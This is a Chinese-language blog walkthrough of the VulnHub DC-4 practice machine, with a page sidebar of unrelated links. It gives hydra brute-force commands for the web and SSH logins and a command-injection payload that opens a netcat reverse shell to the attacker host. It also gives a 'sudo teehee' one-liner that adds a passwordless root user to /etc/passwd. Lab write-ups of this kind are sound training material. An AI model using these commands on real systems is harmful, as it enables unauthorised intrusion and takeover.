当前位置:网站首页>【Try to Hack】vulnhub DC4
【Try to Hack】vulnhub DC4
2022-07-01 16:28:00 【开心星人】
博客主页:开心星人的博客主页
系列专栏:Try to Hack
欢迎关注点赞收藏️留言
首发时间:2022年7月1日
作者水平很有限,如果发现错误,还望告知,感谢!
靶机默认为桥接模式
kali设置为桥接模式
主机发现netdiscover
靶机ip为192.168.0.151
namp -p- -A 192.168.0.151
ssh服务和http服务
访问80端口
dirb常规目录扫描dirb http://192.168.0.151
两个目录403
whatweb http://192.168.0.151
这个页面没法用cwel爬取字典
上弱口令
上hydra,用john自带的字典 /usr/share/john/password.lst
已知用户名为adminhydra -l admin -P /usr/share/john/password.lst 192.168.0.151 http-get /
可以执行命令,但是命令写死了
抓包看一下
确实是的
反弹个shellradio=nc+192.168.0.106+233+-e+/bin/sh&submit=Run
nc -lvvp 233
放包
python -c 'import pty;pty.spawn("/bin/bash")'
获得一个交互式的shell
ls /home
有三个用户
一个一个翻一下
只有jim能看
有密码
继续翻jim下的其他文件
没有权限查看mbox
现在看ssh服务
然后将三个用户保存为user.txt。
我直接把密码备份文件手动复制到了kali攻击机里
用hydra爆破ssh服务hydra -L user.txt -P password.txt 192.168.0.151 ssh -t 60 
ssh爆破出来一个用户
jim:jibril04
登录看一下ssh [email protected]
登录成功
可以查看mbox
这是发邮件,root给jim发的邮件,但是没有邮件内容
在/var/jim里面找到 。(这个/var/mail是默认自带的文件夹,可能就是用来保存邮件的)
得到了charles的密码
登录看看
什么都没发现
现在只能考虑提权了
给了我们charles这个用户,那就用这个用户来提权
test.sh具有suid权限,但是我不知道它什么时候会运行,没见过它运行的样子。
第一考虑用用ping提权,但是发现好像不太行
用sudosudo -l
echo "happy::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
构造一个用户具有root权限,写入/etc/passwd
边栏推荐
- How to use etcd to realize distributed /etc directory
- sql刷题1050. 合作过至少三次的演员和导演
- Red team Chapter 8: blind guess the difficult utilization process of the package to upload vulnerabilities
- Is the programmer's career really short?
- 数据库系统原理与应用教程(006)—— 编译安装 MySQL5.7(Linux 环境)
- How to solve the problem that the battery icon of notebook computer does not display
- China BMS battery management system Market Research Report (2022 Edition)
- Leetcode 216 combined summation III -- backtracking method
- Alibaba cloud, Zhuoyi technology beach grabbing dialogue AI
- Determine whether the linked list is a palindrome linked list
猜你喜欢
What is the effect of choosing game shield safely in the game industry?
Building blocks for domestic databases, stonedb integrated real-time HTAP database is officially open source!
Borui data integrated intelligent observable platform was selected into the "Yunyuan production catalogue" of China Academy of communications in 2022
Is the programmer's career really short?
EndeavourOS移动硬盘安装
SQL question brushing 586 Customers with the most orders
【PyG】文档总结以及项目经验(持续更新
sql刷题584. 寻找用户推荐人
【flask入门系列】Cookie与Session
Girls who want to do software testing look here
随机推荐
Redis 分布式鎖
How to use F1 to F12 correctly on laptop keyboard
Template engine velocity Foundation
China nylon 11 industry research and future forecast report (2022 Edition)
P2893 [USACO08FEB] Making the Grade G(dp&优先队列)
How to use phpipam to manage IP addresses and subnets
How to optimize repeated if err in go language= Nil template code?
Zabbix2.2监控之系统及应用日志监控报警
VMware 虛擬機啟動時出現故障:VMware Workstation 與 Hyper-v 不兼容...
Ring iron pronunciation, dynamic and noiseless, strong and brilliant, magic wave hifiair Bluetooth headset evaluation
Template Engine Velocity Foundation
Is it reliable to open an account on flush with mobile phones? Is there any potential safety hazard
Advantages, values and risks of chain games compared with traditional games
How to use etcd to realize distributed /etc directory
Sword finger offer II 015 All modifiers in the string
How to maintain the laptop battery
China BMS battery management system Market Research Report (2022 Edition)
China benzene hydrogenation Market Research and investment forecast report (2022 Edition)
P2592 [zjoi2008] birthday party (DP)
【直播预约】数据库OBCP认证全面升级公开课